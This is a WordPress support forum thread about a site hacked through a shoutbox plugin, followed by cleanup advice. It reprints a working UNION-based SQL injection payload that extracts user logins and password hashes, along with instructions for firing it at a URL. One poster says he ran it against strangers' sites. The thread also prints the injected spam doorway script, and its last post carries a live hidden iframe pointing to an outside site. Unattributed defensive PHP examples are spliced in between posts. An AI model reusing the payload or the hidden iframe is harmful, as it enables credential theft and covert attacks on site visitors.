
[resolved] Getting hacked today and now, please help (21 posts)

  1. idahofallzcom
    Member
    Posted 6 years ago #

    Well life sucks 8^(

    IdahoFallz.com, I've been getting hacked the past few hours. I suspect SQL injection but I've no idea where or how to plug it. ANY help or advice really would be appreciated!

    The attacker is so far only starting draft posts under various user names, each one taunts me that I've been hacked or places ads. I have the "Notify on draft post" plugin so some of the attacker's posts are being submitted to me for approval, some are not. None have been posted so I'm not sure if the person has admin access (yet). I changed my WP password and my FTP password. My files so far seem ordinary, nothing replaced or added so far.

    The attacker came back a couple hours later and posted a couple more drafts. One is titled "We got owned by Evo - Voide.org/" and the content is:

    It seems that you got owned by Evo, no harm has been done. I have simply found an error within your site and posted a news article to let you know. So this is just a let you know post.
    Peace.
    Evo

    and every single category is checked.

    I changed the passwords to uber-difficult for the users he had created posts under, to compensate if those users had weak passwords.

    A couple hours later he came back, used mostly different users but one user which I had changed the password for, so I don't think that's the avenue.

    I had Pierre's shoutbox running, and this was one message posted:

    -998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users

    I disabled that plugin but a couple hours later I get more saved posts from the attacker.

    I'm looking at the error_log at my site root and see several database error warnings from this afternoon:

    '[02-Feb-2008 19:59:00] WordPress database error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND comment_approved = '1' ORDER BY comment_date DESC LIMIT 1' at line 1 for query SELECT comment_date FROM wp_comments WHERE comment_date > FROM_UNIXTIME(1200790740) AND comment_post_ID = AND comment_approved = '1' ORDER BY comment_date DESC LIMIT 1'

    I know this is Saturday night but any help is really appreciated here.

    Thanks!

  2. whooami
    Member
    Posted 6 years ago #

    remove or rename your xmlrpc.php file

  3. idahofallzcom
    Member
    Posted 6 years ago #

    man and it continues

    I noticed my pages weren't loading, and I was generating HUGE error_logs. I deleted the error_log and two seconds later it was up to 62 mb. I finally got it downloaded and found errors related to a script running in page.php

    This is what I found in my page.php:

    <?php
    $tpl = "/home/.numnod/mwsmedia/mattselznick.com/gfx/t-m-p.html";
    $repl = "<REPL>";
    $w1 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w2 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w3 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w4 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w5 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w6 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w7 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w8 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w9 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w10 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w11 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w12 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w13 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $keys = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $wr1 = $w1[rand(0, count($w1)-1)];
    $wr2 = $w2[rand(0, count($w2)-1)];
    $wr3 = $w3[rand(0, count($w3)-1)];
    $wr4 = $w4[rand(0, count($w4)-1)];
    $wr5 = $w5[rand(0, count($w5)-1)];
    $wr6 = $w6[rand(0, count($w6)-1)];
    $wr7 = $w7[rand(0, count($w7)-1)];
    $wr8 = $w8[rand(0, count($w8)-1)];
    $wr9 = $w9[rand(0, count($w9)-1)];
    $wr10 = $w10[rand(0, count($w10)-1)];
    $wr11 = $w11[rand(0, count($w11)-1)];
    $wr12 = $w12[rand(0, count($w12)-1)];
    $wr13 = $w13[rand(0, count($w13)-1)];
    $q = $_GET['go'];
    $q = ereg_replace(".htm", "", $q);
    $q = ereg_replace("-", " ", $q);
    $fp = fopen($tpl, "r");
    $fin = '';
    while (!feof($fp))
         $fin .= fgets($fp, 1024);
    fclose($fp);
    $fin = ereg_replace($repl, $q, $fin);
    $rd = rand(0,10000);
    $rd = $rd."";
    $rd2 = rand(0,10000);
    $rd2 = $rd2."";
    $rd3 = rand(0,10000);
    $rd3 = $rd3."";
    $rd4 = rand(0,10000);
    $rd4 = $rd4."";
    $rd5 = rand(0,10000);
    $rd5 = $rd5."";
    $fin = ereg_replace("<SOME>", $rd , $fin);
    $fin = ereg_replace("<SOME2>", $rd2 , $fin);
    $fin = ereg_replace("<SOME3>", $rd3 , $fin);
    $fin = ereg_replace("<SOME4>", $rd4 , $fin);
    $fin = ereg_replace("<SOME5>", $rd5 , $fin);
    $wr1l = ereg_replace(" ","-" , $wr1);
    $fin = ereg_replace("<KEY1>", $wr1, $fin);
    $fin = ereg_replace("<KEY1l>", $wr1l, $fin);
    $wr2l = ereg_replace(" ","-" , $wr2);
    $fin = ereg_replace("<KEY2>", $wr2, $fin);
    $fin = ereg_replace("<KEY2l>", $wr2l, $fin);
    $wr3l = ereg_replace(" ","-" , $wr3);
    $fin = ereg_replace("<KEY3>", $wr3, $fin);
    $fin = ereg_replace("<KEY3l>", $wr3l, $fin);
    $wr4l = ereg_replace(" ","-" , $wr4);
    $fin = ereg_replace("<KEY4>", $wr4, $fin);
    $fin = ereg_replace("<KEY4l>", $wr4l, $fin);
    $wr5l = ereg_replace(" ","-" , $wr5);
    $fin = ereg_replace("<KEY5>", $wr5, $fin);
    $fin = ereg_replace("<KEY5l>", $wr5l, $fin);
    $wr6l = ereg_replace(" ","-" , $wr6);
    $fin = ereg_replace("<KEY6>", $wr6, $fin);
    $fin = ereg_replace("<KEY6l>", $wr6l, $fin);
    $fin = ereg_replace("<KEY7>", $wr7, $fin);
    $fin = ereg_replace("<KEY8>", $wr8, $fin);
    $fin = ereg_replace("<KEY9>", $wr9, $fin);
    $fin = ereg_replace("<KEY10>", $wr10, $fin);
    $fin = ereg_replace("<KEY11>", $wr11, $fin);
    $fin = ereg_replace("<KEY12>", $wr12, $fin);
    $fin = ereg_replace("<KEY13>", $wr13, $fin);
    $n = 10;
    $links = "";
    for ($i=0; $i<$n; $i++)
    {
      $rankey = trim($keys[rand(0, count($keys)-1)]);
      $ranhref = ereg_replace(" ", "-", $rankey)."";
      $links = $links." <a href='./?go=$ranhref.htm'>$rankey</a><br>";
    }
    $fin = ereg_replace("<LINK>", $links, $fin);
    echo $fin;
    ?>

    Man I'm getting hacked hard here, any advice to batten down the hatches?

  4. whooami
    Member
    Posted 6 years ago #

    remove or rename your xmlrpc.php file

  5. macsoft3
    Member
    Posted 6 years ago #

    You have a collection of affiliate spam links at the bottom. And, again, 711 here and there...

  6. idahofallzcom
    Member
    Posted 6 years ago #

    cool, i deleted the xmlrpc.php and the footer spam links, so far so good but it's still early

    my host sent me the record showing i was attacked through wordspew chatbox. i was running a slightly older 3.01 version cuz the new one kept blocking users.

    i would like to ensure the latest does not have the same attack vector as 3.01, though

  7. idahofallzcom
    Member
    Posted 6 years ago #

    what's 711 here and there?

  8. idahofallzcom
    Member
    Posted 6 years ago #

    I went to bed last night hoping the activity was over, but it's not. This morning there were three more post drafts saved, each taunting me for being hacked by worldhackerz.net, each under different existing usernames. I saved a local copy of the xmlrpc.php last night and completely deleted it, and I disabled the wordspew plugin. I'm running spybot and ad-aware on my system now.

    Any other advice? I'm also still wondering "what's 711 here and there?"

  9. Joni
    Member
    Posted 6 years ago #

    http://www.textpattern.com

    That's where I'm headed. I'm thoroughly disgusted. I've been a WP forum member for nearly four years. This latest round of crap is the last straw. I develop WP sites for a living and I can no longer countenance this crap. There have been no definitive solutions to my problem. I can't peddle this program to any of my paying clients, it's insanity.

    Backup your database, migrate to TextPattern, import your WP posts and have a nice life.

    It's what I plan to do.

    Sorry I can't be more help.

  10. idahofallzcom
    Member
    Posted 6 years ago #

    Dammit! I just checked my site about 30 minutes ago, no spam links. I check a moment ago again, and the spam links are back in my footer. I check footer.php and that same eval() link is there.

    HELP!?!? What is the hole here?

  11. whooami
    Member
    Posted 6 years ago #

    if you re-enabled wordspew, that might be part of your problem

    There is a version that is exploitable, so if you're opting to use that version for the sake of functionality, well, you can expect to reap what you sow.

  12. idahofallzcom
    Member
    Posted 6 years ago #

    I did not re-enable wordspew, I of course want to wait to make sure I'm not being attacked anymore. I of course also learned my lesson and when I do re-enable wordspew will go with the latest version and will deal with the functionality issues at that time.

    i went to delete the wordspew folder from my plugins directory, and it is gone already. why would the hacker delete it? i looked in my other plugin folders and did not see it moved anywhere. it does not appear in my admin panel plugins activation page, either.

    spybot found not a single issue on my system. i reinstalled my pc a few weeks ago so it is fairly fresh.

    i had one other admin account, but i demoted that account to a writer and changed its password.

    i'll try changing my passwords again, but i've got a feeling this is not over.

    What is the hole here?

  13. whooami
    Member
    Posted 6 years ago #

    What is the hole here?

    Considering that this is the second time you've asked that, and no-one has succinctly answered that question, you might consider your question answered with a "no-one knows".

    You might want to consider some options related to logging the data that's actually sent to your blog. You CAN log all $_POST variables, you don't need to log $_GET requests as they show up in your Apache logs already, but you can, you CAN even log everything that is sent to xmlrpc.php, via the superglobal $_SERVER, but you shouldn't need to do that since you've disabled it.

    In other words, at this point, I can only recommend taking a look at what's going on behind the scenes, so to speak.

    perhaps someone else has other ideas.
    --

    edit
    On second look, regarding xmlrpc.php, just to correct my previous statement, there's a logging option built in.

  14. idahofallzcom
    Member
    Posted 6 years ago #

    Okay, as I said I completely removed the xmlrpc.php file, how do I do this logging? I am reading that other thread and you said to email you for the instructions to do that? do i need to put xmlrpc.php back in there under a renamed filename or ?

    Thanks for the help!

  15. whooami
    Member
    Posted 6 years ago #

    I would NOT put back xmlrpc.php -- that IS NOT a solution to your problem.

    I explain how to log ALL $_POST variables sent to a wordpress blog and why it might be useful on my own blog >

    http://www.village-idiot.org/archives/2008/02/02/wordpress-honeypot-project/

    Please read the following closely:

    You will want to edit that code, so that passwords of your writers are NOT written to the logging file. It's done by putting in the IPs at the top.. My example only provides for 2 IPs, so if you have more than 2 you will need to change that line slightly.

    The file that is written to needs to be writable by the web server, that means, typically, that it needs to be chmod 666.

    Also, this will LOG ALL PASSWORDS used during logging in to the site. (that's why you want to make sure that you edit the $posty_ip so that YOUR info is NOT sent and that NO other administrator info is...

    You will also want to rename the file that is logged to, don't use the default name in my example, as anyone can bring it up in a browser and read it, as long as they know what it is named. (Unless you put it in a non-web accessible directory, which is doable, as well.)

    --

    This is not something that I recommend for the average user. IF, after reading that post, you are completely confused, don't try to forge ahead -- contact me privately at whoo AT whoo.org and if you really want to do this, I will help you through setting it up via email or chat.

    I would also ONLY do this if you are still actively being exploited.
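    The kind of $_POST logger described in the post above, as an added example that is not the code from the linked village-idiot.org post. It assumes you include it from wp-config.php, and the trusted IP list and log path are placeholders you must change. Two design choices go beyond the post: password-type parameters are redacted on every request, not only for the trusted addresses, and the log file lives outside the web root so it cannot be fetched over HTTP.

```php
<?php
// Added example (not the village-idiot.org code): log POST bodies sent to a
// WordPress install while an attack is ongoing. Include from wp-config.php:
//   require_once __DIR__ . '/post-logger.php';   // hypothetical file name

// Placeholder: your own address(es) and those of your other authors.
// Requests from these are never logged (same idea as the $posty_ip list).
$TRUSTED_IPS = ['192.0.2.10', '192.0.2.11'];

// Placeholder path: outside the web root, non-guessable name, must be
// writable by the web server user.
$LOG_FILE = '/home/example/private/req-CHANGE-ME-random.log';

// Parameter names whose values never reach the log, whatever the source IP.
$REDACT = ['pwd', 'pass', 'password', 'pass1', 'pass2', 'user_pass'];

// Replace sensitive values with a marker; recurses into nested arrays.
function mask_sensitive(array $params, array $redact): array {
    $out = [];
    foreach ($params as $k => $v) {
        if (in_array(strtolower((string)$k), $redact, true)) {
            $out[$k] = '[REDACTED]';
        } elseif (is_array($v)) {
            $out[$k] = mask_sensitive($v, $redact);
        } else {
            $out[$k] = (string)$v;
        }
    }
    return $out;
}

// Returns true when a line was written, false when the request was skipped.
function log_request(array $post, array $server, string $file,
                     array $trusted, array $redact): bool {
    $ip = $server['REMOTE_ADDR'] ?? '0.0.0.0';
    if (in_array($ip, $trusted, true)) {
        return false;                  // trusted address: nothing written
    }
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;                  // GETs are already in the Apache access log
    }
    $entry = [
        'time'   => gmdate('Y-m-d\TH:i:s\Z'),
        'ip'     => $ip,
        'uri'    => $server['REQUEST_URI'] ?? '',
        'ua'     => $server['HTTP_USER_AGENT'] ?? '',
        'post'   => mask_sensitive($post, $redact),
    ];
    // One JSON object per line; LOCK_EX keeps concurrent requests from interleaving.
    $line = json_encode($entry, JSON_UNESCAPED_SLASHES) . "\n";
    return file_put_contents($file, $line, FILE_APPEND | LOCK_EX) !== false;
}

log_request($_POST, $_SERVER, $LOG_FILE, $TRUSTED_IPS, $REDACT);
```

Review the resulting file with a JSON-aware tool (one object per line), and remove the include again once the site is quiet, since every POST to the blog, comments included, is written to disk while it is active.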

  16. idahofallzcom
    Member
    Posted 6 years ago #

    Cool, I had not replaced the xmlrpc.php yet so we're good. I think I can do what you're describing, but as you suggested I'll wait to see if I get hacked once more before trying.

    I'll update later today if anything happens or not. The help is invaluable and much appreciated!

  17. idahofallzcom
    Member
    Posted 6 years ago #

    So far so good.

    Maybe one last bit of advice and wisdom for future inquiries. My site is one of the few that really use that shoutbox, since it's locally focused on a city.

    I downloaded Rudd-O's wordspew version 2.4 (latest) cuz it says it corrects the SQL injection that Pierre's had. However, Pierre had some nicer anti-spam measures, and the ability to mark someone's IP as a spammer, then they could not post anymore. Rudd-O's does not, and I'm getting spam dropped every minute. That's a no-go.

    So I went back to Pierre's blog, again I was using the outdated 3.01 so I see Pierre is up to version 3.71. I'm reading through his changelog

    http://pierre.sudarovich.free.fr/index.php/2006/02/28/ajax-shoutbox/

    and it appears at versions 3.3 and 3.34 he fixed some SQL vulnerabilities. Unfortunately I cannot tell if he fixed the SQL vulnerability that allowed my site to get hacked.

    Can anyone verify yay or nay if the 3.71 wordspew from pierre is secure from that SQL vulnerability (which BTW I found: http://www.milw0rm.com/exploits/5039 )

    thanks

  18. whooami
    Member
    Posted 6 years ago #

    you can test that yourself,

    just tack this onto your normal blog url:

    wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users

    I doubt anyone else really wants to attempt an exploit on a stranger's site; I know i dont.

    if it spits out your username and passwd you might wanna pass on it.

  19. Lester Chan
    Member
    Posted 6 years ago #

    i think the id can be fixed by something like $id = intval($_GET['id']); and you should let the author of the plugin know.
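    The fix Lester Chan suggests, shown as an added example that is not the plugin's own code: the unsafe concatenation beside two hardened versions, run over a constructed normal id and an injection-shaped value like the one quoted earlier in the thread. The table and column names are hypothetical; inside WordPress, $wpdb->prepare("... id = %d", $id) performs the same integer coercion as intval().

```php
<?php
// Added example, not code from Pierre's or Rudd-O's shoutbox.
// Hypothetical table/column: wp_chat_log.id

// Unsafe pattern: the raw query-string value is dropped into the SQL text,
// so everything after the number becomes part of the statement.
function build_query_unsafe(string $rawId): string {
    return "SELECT * FROM wp_chat_log WHERE id = $rawId";
}

// Hardened pattern 1 (Lester Chan's suggestion): coerce to an integer.
// intval('-998877/**/UNION...') is -998877, so only the number survives.
function build_query_intval(string $rawId): string {
    $id = intval($rawId);
    return sprintf("SELECT * FROM wp_chat_log WHERE id = %d", $id);
}

// Hardened pattern 2: reject instead of coerce. Anything that is not a plain
// non-negative integer yields null, so the caller can answer 400 and log the
// attempt rather than silently running a query for id -998877.
function validate_id(string $rawId): ?int {
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $id === false ? null : $id;
}

// Constructed inputs: a normal id and a shortened injection-shaped value of
// the kind posted to the shoutbox in this thread.
$inputs = [
    '42',
    '-998877/**/UNION/**/SELECT/**/0,1,user_login/**/FROM/**/wp_users',
];

foreach ($inputs as $raw) {
    echo "input:  $raw\n";
    echo "unsafe: " . build_query_unsafe($raw) . "\n";
    echo "intval: " . build_query_intval($raw) . "\n";
    $id = validate_id($raw);
    echo "strict: " . ($id === null ? 'rejected (would return 400)' : "id=$id") . "\n\n";
}
```

For the first input all three agree; for the second, the unsafe query carries the UNION clause verbatim, the intval() version reduces to WHERE id = -998877, and the strict version refuses the request, which is the variant to prefer when you also want the attempt to show up in a log.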

  20. idahofallzcom
    Member
    Posted 6 years ago #

    It seems settled now, WordPress' 2.3.3 update fixed xmlrpc.php vulnerabilities, and Pierre released 3.72 wordspew to fix the sql injection.

    I did attempt the injection on some other sites, just grayhatting, and got back the database usernames and passwords, but the passwords were all in md5 hash, and I could not get a single one to decipher in the various free engines.

    I wonder how the attacker gained access? Were they able to login under some of my users who created weak passwords? After I updated users with stronger passwords some of them still got cracked again, and none of my users were admin yet some spam links were pasted into my footer, and my entire page.php was replaced by malicious code. My password was a strong mix, so I don't know how they were able to get in that far.

    Perhaps they got in as a low level user, then used another hack to find my admin info?

    Maybe will never know...

  21. newslite
    Member
    Posted 6 years ago #

    I'm too think

    <iframe width="200" height="1" src="http://freelove.100webspace.net/index.php"></iframe>
